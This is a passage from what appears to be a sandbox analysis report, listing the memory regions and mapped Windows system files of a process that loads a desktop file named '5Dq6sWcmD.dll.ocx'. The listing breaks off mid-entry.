Region: id = 378 start_va = 0x7ffe97c00000 end_va = 0x7ffe97c3afff monitored = 0 entry_point = 0x7ffe97c012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 379 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "regsvr32.exe.mui" filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\regsvr32.exe.mui") Region: id = 380 start_va = 0x830000 end_va = 0x9b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 381 start_va = 0x9c0000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 382 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 383 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 384 start_va = 0x7ffe97600000 end_va = 0x7ffe976a6fff monitored = 0 entry_point = 0x7ffe976158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 385 start_va = 0x7ffe97590000 end_va = 0x7ffe975eafff monitored = 0 entry_point = 0x7ffe975a38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 386 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 387 start_va = 0x7ffe97df0000 end_va = 0x7ffe97f32fff monitored = 0 entry_point = 0x7ffe97e18210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 388 start_va = 0x7ffe89410000 end_va = 0x7ffe89683fff monitored = 0 entry_point = 0x7ffe89480400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 389 start_va = 0x4a0000 end_va = 0x55ffff monitored = 0 entry_point = 0x4c0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 390 start_va = 0x480000 end_va = 0x480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 391 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 392 start_va = 0x4b0000 end_va = 0x58cfff monitored = 0 entry_point = 0x50e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 393 start_va = 0x7ffe94680000 end_va = 0x7ffe9468efff monitored = 0 entry_point = 0x7ffe94683210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 394 start_va = 0x7ffe92f80000 end_va = 0x7ffe93015fff monitored = 0 entry_point = 0x7ffe92fa5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 395 start_va = 0x4b0000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 396 start_va = 0x1dc0000 end_va = 0x1e4ffff monitored = 1 entry_point = 0x1dc3040 region_type = mapped_file name = "5dq6swcmd.dll.ocx" filename = "\\Users\\RDHJ0C~1\\Desktop\\5Dq6sWcmD.dll.ocx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\5dq6swcmd.dll.ocx") Region: id = 397 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 398 start_va = 0x7ffe95e70000 end_va = 0x7ffe973cefff monitored = 0 entry_point = 0x7ffe95fd11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 399 start_va = 0x7ffe95390000 end_va = 0x7ffe953d2fff monitored = 0 entry_point = 0x7ffe953a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 400 start_va = 0x7ffe8e340000 end_va = 0x7ffe8e59ffff monitored = 0 entry_point = 0x7ffe8e3eb5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 401 start_va = 0x7ffe94a80000 end_va = 0x7ffe950c3fff monitored = 0 entry_point = 0x7ffe94c464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 402 start_va = 0x7ffe949c0000 end_va = 0x7ffe94a74fff monitored = 0 entry_point = 0x7ffe94a022e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 403 start_va = 0x7ffe94600000 end_va = 0x7ffe9464afff monitored = 0 entry_point = 0x7ffe946035f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 404 start_va = 0x7ffe94660000 end_va = 0x7ffe94673fff monitored = 0 entry_point = 0x7ffe946652e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 405 start_va = 0x1e50000 end_va = 0x7dbcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 406 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 407 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 408 start_va = 0x520000 end_va = 0x577fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 409 start_va = 0x1e50000 end_va = 0x1ea9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 410 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 411 start_va = 0x7ffe951c0000 end_va = 0x7ffe95386fff monitored = 0 entry_point = 0x7ffe9521db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 412 start_va = 0x7ffe94650000 end_va = 0x7ffe9465ffff monitored = 0 entry_point = 0x7ffe946556e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 413 start_va = 0x7ffe8ac40000 end_va = 0x7ffe8adf7fff monitored = 0 entry_point = 0x7ffe8acae630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 414 start_va = 0x7ffe8eb60000 end_va = 0x7ffe8eee1fff monitored = 0 entry_point = 0x7ffe8ebb1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 415 start_va = 0x7ffe93d60000 end_va = 0x7ffe93d7efff monitored = 0 entry_point = 0x7ffe93d65d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 416 start_va = 0x7ffe89ce0000 end_va = 0x7ffe89f6dfff monitored = 0 entry_point = 0x7ffe89db0f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 417 start_va = 0x7ffe92df0000 end_va = 0x7ffe92e02fff monitored = 0 entry_point = 0x7ffe92df2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 418 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 419 start_va = 0x4d0000 end_va = 0x4edfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 420 start_va = 0x4f0000 end_va = 0x4fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 421 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 422 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 423 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 424 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 425 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 426 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 427 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 428 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 429 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 430 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 431 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 432 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 433 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 434 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 435 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 436 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 437 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 438 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 439 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 440 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 441 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 442 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 443 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 444 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 445 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 446 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 447 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 448 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 449 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 450 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 451 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 452 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 453 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 454 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 455 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 456 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 457 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 458 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 459 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 460 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 461 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 462 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 463 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 464 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 465 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 466 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 467 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 468 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 469 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 470 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 471 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 472 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 473 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 474 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 475 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 476 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 477 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 478 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 479 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 480 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 481 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 482 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 483 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 484 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 485 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 486 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 487 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 488 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 489 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 490 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 491 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 492 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 493 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 494 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 495 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 496 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 497 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 498 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 499 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 500 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 501 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 502 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 503 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 504 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 505 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 506 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 507 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 508 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 509 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 510 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 511 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 512 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 513 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 514 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 515 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 516 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 517 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 518 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 519 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 520 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 521 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 522 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 523 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 524 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 525 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 526 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 527 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 528 start_va = 0x4d0000 end_va = 0x4defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 529 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 530 start_va = 0x1eb0000 end_va = 0x21e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 531 start_va = 0x7ffe95d20000 end_va = 0x7ffe95de0fff monitored = 0 entry_point = 0x7ffe95d40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 532 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 533 start_va = 0x7ffe953e0000 end_va = 0x7ffe95486fff monitored = 0 entry_point = 0x7ffe953eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 534 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 535 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 536 start_va = 0x7ffe92c00000 end_va = 0x7ffe92d85fff monitored = 0 entry_point = 0x7ffe92c4d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 537 start_va = 0x500000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 538 start_va = 0x580000 end_va = 0x59afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 539 start_va = 0x2270000 end_va = 0x2270fff monitored = 1 entry_point = 